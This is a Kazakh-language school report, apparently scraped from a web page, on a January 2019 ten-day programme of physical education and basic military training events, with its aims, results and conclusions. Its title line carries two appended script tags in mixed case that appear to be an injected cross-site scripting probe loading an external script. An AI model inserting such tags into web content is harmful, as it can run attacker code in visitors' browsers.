Шаңтөбе кентінің В.Комаров атындағы орта мектебінің дене шынықтыру және АӘД онкүндігі есебі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

23.01.2019

2019 жылдың 10 қаңтары мен 21 қаңтары аралығында онкүндік өткізу жоспарына сәйкес дене шынықтыру және АӘД онкүндігі өтті. Дене шынықтыру және АӘД  мұғалімдері жоспарланған ашық және сыныптан тыс іс-шаралардың барлығын өткізді.

Онкүндік өткізу мақсаты салауатты өмір салтын насихаттау, жүгіру, секіру, лақтыру, ойынадарда оқушылар дағдылар мен ептілік қабілеттерін, қозғалу сапасын дамытады.

Міндеттері:

- пәнге деген қызығушылығын арттыру;

- пән бойынша білімдерін кеңейту;

- шығармашылық қабілетін қалыптастыру;

- ұжымдық пен жолдастыққа, жауапкершілікке тәрбиелеуге көмек беру;

- ерекше қабілетті оқушыларды анықтау.

Нәтижелігі: Барлық іс-шаралар әр оқушының физикалық сапасын, шығармашылық мүмкіндіктерін дамытуға бағытталған. Балалар өздерін эстафеталарда, арқан тартуда көрсете алды.

Тиімділігі: Онкүндік мектептің барлық оқушыларын қамтиды. Бір іс-шара әзірлеп, оны мұғалім әр сыныппен өткізе алады.

Практикалық құндылығы: Ұсынылған материалды дене шынықтыру мұғалімдері,  сынып жетекшілері өздерінің жұмысында қолдана алады.

Жұмыс жүйесін сипаттау: Онкүндік өткізу үшін жоспар жасалды. Пәндік онкүндік өткізгенге дейін бірнеше күн бұрын мектеп әкімшілігімен түзетілді және бекітілді. Пәндік онкүндік соңында қорытынды жасалады, жеңімпаздар грамоталармен марапатталады.

Қорытынды: осы жұмыстың түріне мынадай қорытынды жасауға болады:

- дене шынықтыру пәніне қызығушылықты бекітеді;

- салауатты өмір салтын насихаттайды;

- оқушылардың денсаулығын бекітеді;

- ой-өрісін кеңейтеді;

- қиял мен эмоционалдық сфераны дамытады;

- бірлескен шығармашылық пен әңгімеге тартады.

Пәндік онкүндіктің міндеттері:

  • Онкүндікті ұйымдастыруға және өткізуге барлық оқушыларды тарту.
  • Әр сыныпта іс-шара өткізу, оқушыларды танымдылық қызметтің дамуына көмек беретін, дене шынықтыру бойынша білімдерін кеңейтуге, шығармашылық мүмкіндіктерін қалыптастыру
  • Оқушылардың өз бетінше және жеке, ұжымдық практикалық жұмысын ұйымдастыру, ұжымдық және жолдастық тәрбиеге көмек беру, сезім мәдениетін (жауапкершілік, адалдық, парыздық).

Онкүндік өткізу принциптері: әр бала онкүндіктің барлық оқиғаларының белсенді қатысушысы болып табылады. Ол өзін әр түрлі рөлде байқай алады, өз күшін түрлі іс-әрекетте байқай алады. Эстафеталарға қатыса алады.

Просмотров: 880


Пікір қосу



Деректерді қолтаңбаға қосу